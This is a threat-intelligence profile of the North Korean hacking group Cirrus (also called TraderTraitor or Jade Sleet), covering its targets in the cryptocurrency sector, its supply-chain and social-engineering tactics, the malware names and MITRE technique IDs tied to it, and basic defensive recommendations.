Nation-State Actor
Cirrus (DPRK)
North Korea • Active since 2022
Cirrus is a North Korean hacking team that goes after cryptocurrency and blockchain companies. They trick developers into running malicious code to steal crypto and fund North Korea.
Overview
Cirrus is a North Korean threat actor specializing in supply chain compromises and targeting blockchain developers. They have conducted sophisticated attacks against cryptocurrency exchanges and Web3 companies.
Also Known As
TraderTraitor, Jade Sleet, UNC4899
Target Industries
Cryptocurrency, Blockchain, Financial Technology, Software Development
Target Regions
Global, United States, Europe, Asia
Is your business exposed?
Tactics, Techniques & Procedures
- • Supply chain compromise via npm packages
- • Social engineering of developers
- • Cryptocurrency wallet theft
- • macOS malware deployment
Known Tools & Malware
TraderTraitor malware, npm malicious packages, KANDYKORN, SockSocket
Notable Campaigns
npm Package Compromise (2023)
Published malicious npm packages targeting blockchain developers.
Crypto Exchange Intrusions (2022-2024)
Targeted multiple cryptocurrency exchanges resulting in significant fund theft.
MITRE ATT&CK Techniques
T1195.002, T1566.003, T1059.007, T1567.002
Defense Recommendations
- 1.
Audit npm dependencies for suspicious packages
- 2.
Implement software composition analysis
- 3.
Train developers on social engineering threats
Related Threat Actors
Is your business exposed?
Check if your company data is circulating on the dark web
Free scan • No credit card required